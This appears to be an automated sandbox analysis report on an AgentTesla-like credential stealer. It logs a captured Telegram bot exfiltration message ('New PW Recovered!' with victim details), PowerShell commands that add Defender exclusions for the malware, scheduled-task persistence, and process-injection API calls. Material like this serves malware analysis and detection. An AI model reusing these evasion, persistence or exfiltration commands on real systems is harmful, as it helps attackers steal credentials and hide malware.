2024-10-08 08:00:36 UTC	1050	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 08:00:35 GMT Content-Type: application/json Content-Length: 662 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":270,"from":{"id":6712831410,"is_bot":true,"first_name":"originlogger","username":"BABABA002_BOT"},"chat":{"id":-4195170748,"title":"originlogs002","type":"group","all_members_are_administrators":true},"date":1728374435,"document":{"file_name":"user-172892 2024-10-08 04-00-33.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBDmcE5qP1QmoBG4tYSCy0RhBISW6KAAKKBQAChPooRPUJImYpAdiaNgQ","file_unique_id":"AgADigUAAoT6KEQ","file_size":319},"caption":"New PW Recovered!\n\nTime: 10/08/2024 04:00:33\nUser Name: user/172892\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Target ID:	0
Start time:	04:00:23
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Imagebase:	0xc0000
File size:	707'072 bytes
MD5 hash:	DD2F23684673CA3E5C9F578764769B67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:00:27
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:00:27
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:00:27
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:00:27
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:00:27
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp"
Imagebase:	0x760000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:00:28
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:00:28
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Imagebase:	0x770000
File size:	707'072 bytes
MD5 hash:	DD2F23684673CA3E5C9F578764769B67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2945148313.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	04:00:30
Start date:	08/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:00:30
Start date:	08/10/2024
Path:	C:\Users\user\AppData\Roaming\eFzAvsOm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eFzAvsOm.exe
Imagebase:	0x970000
File size:	707'072 bytes
MD5 hash:	DD2F23684673CA3E5C9F578764769B67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 16%, ReversingLabs Detection: 30%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:00:33
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp"
Imagebase:	0x760000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:00:33
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:00:33
Start date:	08/10/2024
Path:	C:\Users\user\AppData\Roaming\eFzAvsOm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\eFzAvsOm.exe"
Imagebase:	0xb30000
File size:	707'072 bytes
MD5 hash:	DD2F23684673CA3E5C9F578764769B67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2944094662.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	166
Total number of Limit Nodes:	7

Executed Functions

Function 06C1D3D4 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f4fbd1aaa3109695284d8a8861f509262f1cf4a4510515d3086ba5221250ea
Instruction ID: 9cad8c750e8c2826a236157073fd55fac227a34eee72c583d73c04449ec09d71
Opcode Fuzzy Hash: 87f4fbd1aaa3109695284d8a8861f509262f1cf4a4510515d3086ba5221250ea
Instruction Fuzzy Hash: FFA25B71E002598FDB54DF68C8586EDB7B2FF89300F1486A9D90AA7350EB74AE95CF40

Function 06C11248 Relevance: .7, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bab514d37dc7a4db1a4aa3a8530c8b8cc306424b5fb4fc4300ae2d68d63601c
Instruction ID: 2a7f877ad0d484e63cc5374ba3f4fd6baa89e8fdb356d3fdb9d9e6c4fda651a2
Opcode Fuzzy Hash: 3bab514d37dc7a4db1a4aa3a8530c8b8cc306424b5fb4fc4300ae2d68d63601c
Instruction Fuzzy Hash: 06526734B01200CFDB68AB79C4586AE77E6FF8A306F1448ADD647DB764DA399C41CB81

Function 06C13A50 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d7abdc480e1f7d98d193d807fc62234881adab38ccea5d58b5824961048225
Instruction ID: 77a31ca75bc02486aaea109da0eed91f45973c822217693918ba20f5ed35c69a
Opcode Fuzzy Hash: 03d7abdc480e1f7d98d193d807fc62234881adab38ccea5d58b5824961048225
Instruction Fuzzy Hash: 29223830A10219CFCB54DF68D884A9DBBB2FF85305F158599E849AB265DB30EE85CF90

Function 06FF59B0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7048054cf1b0787e675e9292bfc9f1a34cd4c1959280aaa0f4c1a46438ae4f99
Instruction ID: 2d4152587ef55edebd783133f773cad4c04e29c4000f10c5223a456d1238a323
Opcode Fuzzy Hash: 7048054cf1b0787e675e9292bfc9f1a34cd4c1959280aaa0f4c1a46438ae4f99
Instruction Fuzzy Hash: 36E0867681E259CFD780CF74D8445B4FBF5AF17310F442255861AD33A2D7308940CB15

Function 06FF5AC3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0594267a612d1f42f19ca1c3fc4f318ab1329bd6fc8a01db391b546dc6b4b0
Instruction ID: e8aff856a62df317c42ac227b4a3a3520b111ff0a80686754d7b7a299f0a8081
Opcode Fuzzy Hash: cf0594267a612d1f42f19ca1c3fc4f318ab1329bd6fc8a01db391b546dc6b4b0
Instruction Fuzzy Hash: 37D05E79C1E154CFC7C09F7899442F4B6F9AF16301F4821A5920EE7223D6304640CA39

Function 023DD550 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 023DD5DE
GetCurrentThread.KERNEL32 ref: 023DD61B
GetCurrentProcess.KERNEL32 ref: 023DD658
GetCurrentThreadId.KERNEL32 ref: 023DD6B1

Strings

Hf|, xrefs: 023DD6DD

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Hf|
API String ID: 2063062207-3957126236
Opcode ID: 86f7b6c91940d9dabb10945e27f8181cf28c647bcaa6547b4a4832bb4d518aa3
Instruction ID: 4b04a7bedee0cea8469611bff9ea75b11506d0bf94776d1db250ff6501623dea
Opcode Fuzzy Hash: 86f7b6c91940d9dabb10945e27f8181cf28c647bcaa6547b4a4832bb4d518aa3
Instruction Fuzzy Hash: 465176B59003498FDB14DFA9D548BDEBFF1BF88314F208499E409A73A1DB345988CB69

Function 023DD560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 023DD5DE
GetCurrentThread.KERNEL32 ref: 023DD61B
GetCurrentProcess.KERNEL32 ref: 023DD658
GetCurrentThreadId.KERNEL32 ref: 023DD6B1

Strings

Hf|, xrefs: 023DD6DD

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Hf|
API String ID: 2063062207-3957126236
Opcode ID: 4b57825e94010140fba5e0cd9c1f595ae9832c1ba4613fee80a52af70c0bf668
Instruction ID: 1a44ee44dcc44d2dc5e4cd60582965f0aa75a3924beb7a1e6a2dd470963dbdf6
Opcode Fuzzy Hash: 4b57825e94010140fba5e0cd9c1f595ae9832c1ba4613fee80a52af70c0bf668
Instruction Fuzzy Hash: A75155B59003098FDB14DFAAD548BDEBBF1FF88314F208459E409A73A0DB746984CB69

Function 04B680A0 Relevance: 3.9, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04B680E7
, xrefs: 04B680EE
Hf|, xrefs: 04B6812B

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $ $Hf|
API String ID: 0-887135201
Opcode ID: 79412761ea3316bdb07779d2e83a8e6816d11b4be8563fb3c85df70b3053bc38
Instruction ID: 18c449c1ed5560870671a392d88268aa03274754a35a9e8790e8e5419aa1528d
Opcode Fuzzy Hash: 79412761ea3316bdb07779d2e83a8e6816d11b4be8563fb3c85df70b3053bc38
Instruction Fuzzy Hash: 0E71E671900701CFDB41EF28E48595477B5FF85304F518AA8D949AB326EB71F899CF80

Function 04B67654 Relevance: 3.9, Strings: 3, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04B680E7
, xrefs: 04B680EE
Hf|, xrefs: 04B6812B

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $ $Hf|
API String ID: 0-887135201
Opcode ID: 74d34c2cc1659f8b9f01c1a2b2eeece68bf7e03f02cc3cef84a7dc237154d750
Instruction ID: bf2e85548b03f3802ef27bd4692dc1d7626ed8d18812c1ed1be968db898c751e
Opcode Fuzzy Hash: 74d34c2cc1659f8b9f01c1a2b2eeece68bf7e03f02cc3cef84a7dc237154d750
Instruction Fuzzy Hash: 3C61B471910702CFDB40EF29E48595577B9FF85304F508AA8DA59AB326EB71F898CF80

Function 06C07C4F Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(0000003B), ref: 06C07CAE
GetSystemMetrics.USER32(0000003C), ref: 06C07CE8

Memory Dump Source

Source File: 00000000.00000002.1774728026.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c00000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: ce60c28f31e50c66f62f487a658752930dbc8d22b626b06977e83dee87c5e7c3
Instruction ID: c897b751e3c7249c3a576ec01b26c926e28982a2c0febd1b94f736a48a5a2e97
Opcode Fuzzy Hash: ce60c28f31e50c66f62f487a658752930dbc8d22b626b06977e83dee87c5e7c3
Instruction Fuzzy Hash: E921BBB0C003488EEB20DF99D4897DEBFF0EB49315F20845AD049AB391C3742649CFA0

Function 06C56140 Relevance: 2.6, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8hq, xrefs: 06C561D3
8hq, xrefs: 06C5619C

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8hq$8hq
API String ID: 0-601589740
Opcode ID: 6972635b224c6f408424ca23095db39fca7abe36eb6496731de93e5f7a7c53bb
Instruction ID: bd013b39d0cbaab226356f97ae271322d1b8a02c4a699f8f544bafd721553ef6
Opcode Fuzzy Hash: 6972635b224c6f408424ca23095db39fca7abe36eb6496731de93e5f7a7c53bb
Instruction Fuzzy Hash: 4B21D534B10318CFEB949A6A9C05A3B76E7EBC8311B554439DA06DB391DE30CD804BD5

Function 06C5E22C Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'/=, xrefs: 06C5E4DB
1`7, xrefs: 06C5E33A

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: '/=$1`7
API String ID: 0-2319240431
Opcode ID: 0f7f21ee0efc88fe29901eac608125b1a8f462904ac8db2ff0da0b2a1a33454b
Instruction ID: 9e79fe3329e0cc87589bd6e76dddc21e63cb276023bee3e6016694c49d0ad5d6
Opcode Fuzzy Hash: 0f7f21ee0efc88fe29901eac608125b1a8f462904ac8db2ff0da0b2a1a33454b
Instruction Fuzzy Hash: 63311AB4D04225CFDB90DF64ED58BAD7BB2FB4D241F00859AD81AA7315D7309A86CF60

Function 06FF2005 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF2246

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 769ae762c5f6c96eaf5fc0409aa95dd228879b2134ad9b228cfecec3d5170116
Instruction ID: 33d194c33e8ca6bbba779bd5f56bfca37be63b290211e312493f5c2b65c26b3f
Opcode Fuzzy Hash: 769ae762c5f6c96eaf5fc0409aa95dd228879b2134ad9b228cfecec3d5170116
Instruction Fuzzy Hash: D0A18CB1D102198FEF60CFA8C841BEDBBB2FF48310F048569D909A7290DB759A85CF91

Function 06FF2010 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF2246

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4d82f8a2ccc3b73aaef5750e056ea0f76c910bcf754ad5689c5e23f835991594
Instruction ID: 92bb5fabdff42899c93b527240eb058882192720dec22a02d44e465edf31dcd7
Opcode Fuzzy Hash: 4d82f8a2ccc3b73aaef5750e056ea0f76c910bcf754ad5689c5e23f835991594
Instruction Fuzzy Hash: DF917CB1D102198FEF64CFA8C8417EEBBB2FF48310F048569D909A7290DB759A85CF91

Function 023DAEB8 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 023DB11E

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d590ddc26ce47cd4bf6607d7c818404f3ea0503708b72f4c20be56d550a0987
Instruction ID: 66f28676a3c8906b05da42e77d3be6c68c3331aacc65a615ed17492b9e6e8a61
Opcode Fuzzy Hash: 5d590ddc26ce47cd4bf6607d7c818404f3ea0503708b72f4c20be56d550a0987
Instruction Fuzzy Hash: A7816AB1A00B458FD724CF29E54479ABBF6FF88304F00896DE48AD7A50D775E946CB90

Function 06C1A299 Relevance: 1.6, APIs: 1, Instructions: 103timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,023F6428,?,?,?,?,?,?,06C1A0B0,00000000,00000000,?), ref: 06C1A25D

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: ef74ddc20c3eebbd870172b3460d2a4cb8d3b170e7d0547fd148baeacd97685e
Instruction ID: d5aecb87566bb4d3e2b7c794db54b8b83c651cbce22e3462ae8a330eba5c7c44
Opcode Fuzzy Hash: ef74ddc20c3eebbd870172b3460d2a4cb8d3b170e7d0547fd148baeacd97685e
Instruction Fuzzy Hash: 5231E731A01200CFDB649BA9D448BAEBFE1EF86310F1940AEE409DB3A2C675DD45DB50

Function 023D591C Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 023D59D9

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 484dba0f0aaee9f25040c0c6d90d5ac81ab41d671810b7a62efb9295c92877db
Instruction ID: ba78b64c906476bc633159dbd7d5927d61f7c735c186aeaa6540d381bc441a3e
Opcode Fuzzy Hash: 484dba0f0aaee9f25040c0c6d90d5ac81ab41d671810b7a62efb9295c92877db
Instruction Fuzzy Hash: 0C41E0B1C00719CEEB24CFA9C884BDEBBF5BF49314F20805AD449AB251DB75694ACF50

Function 023D4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 023D59D9

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 67c746563280239b3df5ad7d45f6c14d538b0ef3f7fdf98a1414f3313f74aea6
Instruction ID: e3f2cf19bc7e2bad719247d9eaf6c4f346ba58340e7a58d64a9cfc662d071cc2
Opcode Fuzzy Hash: 67c746563280239b3df5ad7d45f6c14d538b0ef3f7fdf98a1414f3313f74aea6
Instruction Fuzzy Hash: 2D41E2B1C0071DCBDB24DFA9C884B9EBBF5BF48314F60806AD409AB255DB756949CF90

Function 06FF1980 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF1A18

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e935662a8b78c48dea3c7ba8e4ddde4710ad280f989a37cb2335304e0e3ab302
Instruction ID: 78f03b549c038289ad53b51028c8de49790cd0aa709f2c621e751f730860e6cb
Opcode Fuzzy Hash: e935662a8b78c48dea3c7ba8e4ddde4710ad280f989a37cb2335304e0e3ab302
Instruction Fuzzy Hash: 2A2155B1D103499FCB10CFAAC885BDEBBF5FF48310F10882AE959A7240C7789945DBA0

Function 06FF1988 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF1A18

Memory Dump Source

